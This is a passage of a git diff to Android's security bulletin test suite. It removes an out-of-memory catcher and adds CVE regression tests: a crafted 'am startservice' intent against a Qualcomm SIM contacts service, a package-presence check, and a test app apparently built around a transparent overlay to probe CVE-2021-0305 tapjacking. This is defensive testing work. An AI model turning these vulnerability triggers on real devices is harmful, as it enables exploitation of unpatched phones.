- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import com.android.tradefed.device.CollectingOutputReceiver;
-import com.android.tradefed.device.DeviceNotAvailableException;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceTestCase;
-import com.android.tradefed.device.BackgroundDeviceAction;
-
-import android.platform.test.annotations.RootPermissionTest;
-
-import java.io.BufferedOutputStream;
-import java.io.File;
-import java.io.FileOutputStream;
-import java.io.IOException;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.util.Scanner;
-import java.util.regex.Pattern;
-import java.util.regex.Matcher;
-import java.util.Map;
-import java.util.HashMap;
-import java.util.concurrent.ConcurrentHashMap;
-import com.android.ddmlib.MultiLineReceiver;
-import com.android.ddmlib.Log;
-import com.android.ddmlib.TimeoutException;
-import java.lang.ref.WeakReference;
-
-/**
- * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that
- * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an
- * instance per instance of SecurityTestCase and call start() and stop() matching to
- * SecurityTestCase setup() and teardown().
- */
-public class HostsideOomCatcher {
-
- private static final String LOG_TAG = "HostsideOomCatcher";
-
- private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = (long)(1.5 * 1024 * 1024); //1.5GB
- private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers =
- new ConcurrentHashMap<>();
- private static Map<String, Long> totalMemories = new ConcurrentHashMap<>();
-
- private boolean isLowMemoryDevice = false;
-
- private SecurityTestCase context;
-
- /**
- * test behavior when oom is detected.
- */
- public enum OomBehavior {
- FAIL_AND_LOG, // normal behavior
- PASS_AND_LOG, // skip tests that oom low memory devices
- FAIL_NO_LOG, // tests that check for oom
- }
- private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads
- private boolean oomDetected = false; // accessed across threads
-
- public HostsideOomCatcher(SecurityTestCase context) {
- this.context = context;
- }
-
- /**
- * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal
- */
- private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException {
- // cache device TotalMem to avoid an adb shell for every test.
- String serial = device.getSerialNumber();
- Long totalMemory = totalMemories.get(serial);
- if (totalMemory == null) {
- String memInfo = device.executeShellCommand("cat /proc/meminfo");
- Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]");
- Matcher matcher = pattern.matcher(memInfo);
- if (matcher.find()) {
- totalMemory = Long.parseLong(matcher.group(1));
- } else {
- throw new RuntimeException("Could not get device memory total.");
- }
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "Device " + serial + " has " + totalMemory + "KB total memory.");
- totalMemories.put(serial, totalMemory);
- }
- return totalMemory;
- }
-
- /**
- * Start the hostside oom catcher thread for the test.
- * Match this call to SecurityTestCase.setup().
- */
- public synchronized void start() throws Exception {
- long totalMemory = getMemTotal(getDevice());
- isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB;
-
- // reset test oom behavior
- // Devices should fail tests that OOM so that they'll be ran again with --retry.
- // If the test OOMs because previous tests used the memory, it will likely pass
- // on a second try.
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- oomDetected = false;
-
- // Cache OOM detection in separate persistent threads for each device.
- WeakReference<BackgroundDeviceAction> reference =
- oomCatchers.get(getDevice().getSerialNumber());
- BackgroundDeviceAction oomCatcher = null;
- if (reference != null) {
- oomCatcher = reference.get();
- }
- if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) {
- AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice());
-
- oomCatcher = new BackgroundDeviceAction(
- "logcat -c && logcat OomCatcher:V *:S",
- "Oom Catcher background thread",
- getDevice(), new OomReceiver(getDevice()), 0);
-
- oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher));
- oomCatcher.start();
- }
- }
-
- /**
- * Stop the hostside oom catcher thread.
- * Match this call to SecurityTestCase.setup().
- */
- public static void stop(String serial) {
- WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial);
- if (reference != null) {
- BackgroundDeviceAction oomCatcher = reference.get();
- if (oomCatcher != null) {
- oomCatcher.cancel();
- }
- }
- }
-
- /**
- * Check every test teardown to see if the device oomed during the test.
- */
- public synchronized boolean isOomDetected() {
- return oomDetected;
- }
-
- /**
- * Return the current test behavior for when oom is detected.
- */
- public synchronized OomBehavior getOomBehavior() {
- return oomBehavior;
- }
-
- /**
- * Flag meaning the test will likely fail on devices with low memory.
- */
- public synchronized void setHighMemoryTest() {
- if (isLowMemoryDevice) {
- oomBehavior = OomBehavior.PASS_AND_LOG;
- } else {
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- }
- }
-
- /**
- * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability
- * intentionally OOMs the device.
- */
- public synchronized void setOomTest() {
- oomBehavior = OomBehavior.FAIL_NO_LOG;
- }
-
- private ITestDevice getDevice() {
- return context.getDevice();
- }
-
- /**
- * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot
- * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive.
- */
- class OomReceiver extends MultiLineReceiver {
-
- private ITestDevice device = null;
- private boolean isCancelled = false;
-
- public OomReceiver(ITestDevice device) {
- this.device = device;
- }
-
- @Override
- public void processNewLines(String[] lines) {
- for (String line : lines) {
- if (Pattern.matches(".*Low memory.*", line)) {
- // low memory detected, reboot device to clear memory and pass test
- isCancelled = true;
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "lowmemorykiller detected; rebooting device.");
- synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected
- oomDetected = true; // set HostSideOomCatcher var
- }
- try {
- device.nonBlockingReboot();
- device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- return; // we don't need to process remaining lines in the array
- }
- }
- }
-
- @Override
- public boolean isCancelled() {
- return isCancelled;
- }
- }
-}
-
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
index 39b7ada..0895607 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
@@ -44,7 +44,6 @@
@Test
@SecurityTest(minPatchLevel = "2016-05")
public void testPocCVE_2015_1805() throws Exception {
- getOomCatcher().setHighMemoryTest();
AdbUtils.runPoc("CVE-2015-1805", getDevice(), TIMEOUT_NONDETERMINISTIC);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index 4367a61..835c1cf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -58,7 +58,6 @@
@Test
@SecurityTest(minPatchLevel = "2016-07")
public void testPocCVE_2016_3747() throws Exception {
- getOomCatcher().setHighMemoryTest();
AdbUtils.runPocAssertNoCrashes("CVE-2016-3747", getDevice(), "mediaserver");
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
index 44b0d89..dc41d7c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -33,7 +33,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13286() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice());
}
@@ -44,7 +43,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13288() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13288", getDevice());
}
@@ -55,7 +53,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13289() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13289", getDevice());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
index 6b51f0a..e3128f1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
@@ -33,7 +33,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-05")
public void testPocCVE_2017_13315() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice());
}
@@ -44,7 +43,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-05")
public void testPocCVE_2017_13312() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
index 172f0fc..64929d9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
@@ -35,4 +35,26 @@
AdbUtils.runPocAssertNoCrashes(
"CVE-2018-9424", getDevice(), "android\\.hardware\\.drm@\\d\\.\\d-service");
}
+
+ /*
+ * CVE-2017-18275
+ */
+ @Test
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testPocCVE_2017_18275() throws Exception {
+ String command =
+ "am startservice "
+ + "-n com.qualcomm.simcontacts/com.qualcomm.simcontacts.SimAuthenticateService "
+ + "-a android.accounts.AccountAuthenticator -e account_name cve_2017_18275";
+ String result = AdbUtils.runCommandLine(
+ "pm list packages | grep com.qualcomm.simcontacts", getDevice());
+ if (result.contains("com.qualcomm.simcontacts")) {
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.runCommandLine(command, getDevice());
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine(
+ "Authenticator: Add SIM account.*ContactsProvider: Accounts changed",
+ logcat);
+ }
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java
new file mode 100644
index 0000000..9c60f67
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class Poc19_04 extends SecurityTestCase {
+
+ /**
+ * CVE-2018-13895
+ */
+ @Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testPocCVE_2018_13895() throws Exception {
+ String result = AdbUtils.runCommandLine(
+ "pm list package com.suntek.mway.rcs.app.service",getDevice());
+ assertFalse(result.contains("com.suntek.mway.rcs.app.service"));
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
index fe8c239..07f45db 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
@@ -133,8 +133,8 @@
}
testFile += bitness;
}
- File localFile = buildHelper.getTestFile(testFile);
CLog.i("Pushing local: %s to remote: %s", testFile.toString(), remoteFile);
+ File localFile = buildHelper.getTestFile(testFile);
device.pushFile(localFile, remoteFile);
if (cleanup) {
filesToCleanup.add(remoteFile);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
index 10137a0..5dc4590 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
@@ -58,7 +58,6 @@
private long kernelStartTime;
- private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this);
private HostsideMainlineModuleDetector mainlineModuleDetector = new HostsideMainlineModuleDetector(this);
@Rule public TestName testName = new TestName();
@@ -80,7 +79,6 @@
// TODO:(badash@): Watch for other things to track.
// Specifically time when app framework starts
- oomCatcher.start();
sBuildInfo.put(getDevice(), getBuild());
sAbi.put(getDevice(), getAbi());
sTestName.put(getDevice(), testName.getMethodName());
@@ -95,8 +93,6 @@
*/
@After
public void tearDown() throws Exception {
- oomCatcher.stop(getDevice().getSerialNumber());
-
try {
getDevice().waitForDeviceAvailable(90 * 1000);
} catch (DeviceNotAvailableException e) {
@@ -105,27 +101,11 @@
getDevice().waitForDeviceAvailable(30 * 1000);
}
- if (oomCatcher.isOomDetected()) {
- // we don't need to check kernel start time if we intentionally rebooted because oom
- updateKernelStartTime();
- switch (oomCatcher.getOomBehavior()) {
- case FAIL_AND_LOG:
- fail("The device ran out of memory.");
- break;
- case PASS_AND_LOG:
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test.");
- break;
- case FAIL_NO_LOG:
- fail();
- break;
- }
- } else {
- long deviceTime = getDeviceUptime() + kernelStartTime;
- long hostTime = System.currentTimeMillis() / 1000;
- assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2);
+ long deviceTime = getDeviceUptime() + kernelStartTime;
+ long hostTime = System.currentTimeMillis() / 1000;
+ assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2);
- // TODO(badash@): add ability to catch runtime restart
- }
+ // TODO(badash@): add ability to catch runtime restart
}
public static IBuildInfo getBuildInfo(ITestDevice device) {
@@ -231,7 +211,22 @@
* Check if a driver is present on a machine.
*/
protected boolean containsDriver(ITestDevice device, String driver) throws Exception {
- boolean containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0;
+ boolean containsDriver = false;
+ if (driver.contains("*")) {
+ // -A list all files but . and ..
+ // -d directory, not contents
+ // -1 list one file per line
+ // -f unsorted
+ String ls = "ls -A -d -1 -f " + driver;
+ if (AdbUtils.runCommandGetExitCode(ls, device) == 0) {
+ String[] expanded = device.executeShellCommand(ls).split("\\R");
+ for (String expandedDriver : expanded) {
+ containsDriver |= containsDriver(device, expandedDriver);
+ }
+ }
+ } else {
+ containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0;
+ }
MetricsReportLog reportLog = buildMetricsReportLog(getDevice());
reportLog.addValue("path", driver, ResultType.NEUTRAL, ResultUnit.NONE);
@@ -293,10 +288,6 @@
kernelStartTime = (System.currentTimeMillis() / 1000) - uptime;
}
- public HostsideOomCatcher getOomCatcher() {
- return oomCatcher;
- }
-
/**
* Return true if a module is play managed.
*
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 987e3e3..c596244 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -111,6 +111,7 @@
@SecurityTest(minPatchLevel = "2020-11")
@Test
public void testPocCVE_2020_0450() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0450", null, getDevice());
}
@@ -166,6 +167,7 @@
@SecurityTest(minPatchLevel = "2019-08")
@Test
public void testPocCVE_2019_2133() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2133", null, getDevice());
}
@@ -176,6 +178,7 @@
@SecurityTest(minPatchLevel = "2019-08")
@Test
public void testPocCVE_2019_2134() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2134", null, getDevice());
}
@@ -528,7 +531,11 @@
String binaryName = "CVE-2018-9537";
String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
- testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ // example of check crash to skip:
+ // Abort message: 'frameworks/av/media/extractors/mkv/MatroskaExtractor.cpp:548 CHECK(mCluster) failed.'
+ testConfig.config = new CrashUtils.Config()
+ .setProcessPatterns(binaryName)
+ .appendAbortMessageExcludes("CHECK\\(.*?\\)");
testConfig.config.setSignals(signals);
AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp
new file mode 100644
index 0000000..7001533
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp
@@ -0,0 +1,31 @@
+// Copyright (C) 2021 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+android_test_helper_app {
+ name: "CVE-2021-0305",
+ defaults: ["cts_support_defaults"],
+ srcs: ["src/**/*.java"],
+ test_suites: [
+ "cts",
+ "vts10",
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "androidx.test.core",
+ ],
+ sdk_version: "current",
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml
new file mode 100644
index 0000000..07131a6
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml
@@ -0,0 +1,51 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ package="android.security.cts.CVE_2021_0305"
+ android:targetSandboxVersion="2">
+
+ <uses-permission android:name="android.permission.CAMERA" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
+
+ <application>
+ <uses-library android:name="android.test.runner" />
+ <activity
+ android:name=".MainActivity"
+ android:label="ST (Permission)"
+ android:taskAffinity="android.security.cts.CVE_2021_0305.MainActivity"
+ android:exported="true">
+
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity
+ android:name=".OverlayActivity"
+ android:theme="@style/OverlayTheme"
+ android:exported="true"/>
+
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_0305" />
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml
new file mode 100644
index 0000000..20a9812
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+ android:orientation="vertical"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ xmlns:tools="http://schemas.android.com/tools"
+ xmlns:app="http://schemas.android.com/apk/res-auto"
+ tools:context=".MainActivity">
+
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/sample_text"
+ />
+
+ <Button
+ android:id="@+id/testButton1"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/test_button_label"
+ android:layout_centerInParent="true"
+ android:gravity="end|center_vertical"
+ />
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml
new file mode 100644
index 0000000..815602c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml
@@ -0,0 +1,28 @@
+<resources>
+
+ <attr name="colorOverlay" format="color" />
+ <attr name="colorDialog" format="color" />
+ <attr name="projectAlpha" format="float" />
+
+ <!-- Switch between the two to see what's happening behind the attacks -->
+ <style name="AppTheme" parent="SeeBehind"/>
+ <!--<style name="AppTheme" parent="AppThemeBase.SeeBehind"/>-->
+
+ <style name="SeeBehind">
+ <item name="colorOverlay">#BB4BEFD7</item>
+ <item name="colorDialog">#88FFFFFF</item>
+ <item name="projectAlpha">0.0</item>
+ </style>
+
+ <color name="colorM">#5600D1</color>
+
+ <style name="OverlayTheme" parent="AppTheme">
+ <!--<item name="android:windowBackground">@color/colorM</item>-->
+ <item name="android:windowBackground">@android:color/transparent</item>
+ <item name="android:windowAnimationStyle">@null</item>
+ <item name="android:windowIsTranslucent">true</item>
+ </style>
+
+
+
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml
new file mode 100644
index 0000000..ab8b450
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml
@@ -0,0 +1,5 @@
+<resources>
+ <string name="app_name">CVE_2021_0305</string>
+ <string name="test_button_label">Test Button</string>
+ <string name="sample_text">text in activity</string>
+</resources>
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java
new file mode 100644
index 0000000..5634f4f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java
@@ -0,0 +1,142 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0305;
+
+import org.junit.Before;
+import org.junit.After;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.SystemClock;
+import android.util.Log;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import androidx.test.filters.SdkSuppress;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+import androidx.test.uiautomator.BySelector;
+
+import static org.hamcrest.CoreMatchers.equalTo;
+import static org.hamcrest.CoreMatchers.is;
+import static org.hamcrest.CoreMatchers.notNullValue;
+import static org.junit.Assert.assertThat;
+import static org.junit.Assert.assertFalse;
+
+/**
+ * Basic sample for unbundled UiAutomator.
+ */
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private static final String BASIC_SAMPLE_PACKAGE
+ = "android.security.cts.CVE_2021_0305";
+ private static final int LAUNCH_TIMEOUT_MS = 20000;
+ private static final String STRING_TO_BE_TYPED = "UiAutomator";
+
+ private UiDevice mDevice;
+
+ @Before
+ public void startMainActivityFromHomeScreen() {
+
+ Log.d("CVE", "startMainActivityFromHomeScreen()");
+
+ // Initialize UiDevice instance
+ mDevice = UiDevice.getInstance(getInstrumentation());
+
+ // Start from the home screen
+ mDevice.pressHome();
+
+ // Launch the blueprint app
+ Context context = getApplicationContext();
+ assertThat(context, notNullValue());
+ PackageManager packageManager = context.getPackageManager();
+ assertThat(packageManager, notNullValue());
+ final Intent intent = packageManager.getLaunchIntentForPackage(BASIC_SAMPLE_PACKAGE);
+ assertThat(intent, notNullValue());
+
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); // Clear out any previous instances
+ context.startActivity(intent);
+
+ // Wait for the app to appear
+ Log.d("CVE", "wait for the app to appear");
+ mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS);
+ Log.d("CVE", "app appeared");
+ }
+
+ @After
+ public void lastOperation(){
+ Log.d("CVE", "lastOperation() wait 20s");
+ SystemClock.sleep(20000);
+ Log.d("CVE", "lastOperation() completed");
+ }
+
+ @Test
+ public void testClick() {
+ Log.d("CVE", "testClick()");
+ boolean clicked = false;
+ java.util.List<UiObject2> objects;
+ BySelector selector = By.clickable(true);
+ String button;
+
+ //Detect "Test Button".
+ //"Test Button" appears after onResume().
+ //mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS);
+ //waits for onEnterAnimationComplete() to finish.
+ //So we have LAUNCH_TIMEOUT_MS for the button to appear.
+ //If the button it still not available then
+ //we assume the button is obscured and the test passes.
+ Log.d("CVE", "looking for clickable");
+ objects = mDevice.findObjects(selector);
+ for (UiObject2 o : objects) {
+ button = o.getText();
+ Log.d("CVE", "button:" + button);
+
+ if(button==null){
+ //check the next button
+ continue;
+ }
+
+ switch(button){
+ case "Test Button" :
+ o.click();
+ clicked=true;
+ Log.i("CVE", "clicked: Test Button");
+ break;
+ default :
+ //check the next button
+ continue;
+ }
+
+ //A button this test is looking for just got pressed.
+ //Ignore remaining buttons
+ break;
+ }
+
+ Log.d("CVE", "testClick() end");
+ assertFalse(clicked);
+ Log.d("CVE", "testClick() passed");
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java
new file mode 100644
index 0000000..50a1622
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0305;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.Manifest.permission;
+import android.os.Bundle;
+import android.os.Handler;
+import android.view.View;
+import android.widget.EditText;
+import android.widget.TextView;
+import android.util.Log;
+import android.widget.Button;
+import android.os.SystemClock;
+import static android.content.Intent.FLAG_ACTIVITY_NO_ANIMATION;
+
+
+public class MainActivity extends Activity {
+
+ private static final int REQUEST_CAMERA_PERMISSION = 0;
+ Button testButton1;
+
+ @Override
+ public void onCreate(Bundle b) {
+ super.onCreate(b);
+ Log.e("CVE", "onCreate");
+ setContentView(R.layout.activity_main);
+ testButton1 = (Button) findViewById(R.id.testButton1);//get id of button
+
+ testButton1.setOnClickListener(new View.OnClickListener() {
+ @Override
+ public void onClick(View view) {
+ Log.d("CVE", "button click received");
+ }
+ });
+ }
+
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ Log.d("CVE", "MainActivity.onEnterAnimationComplete()");
+
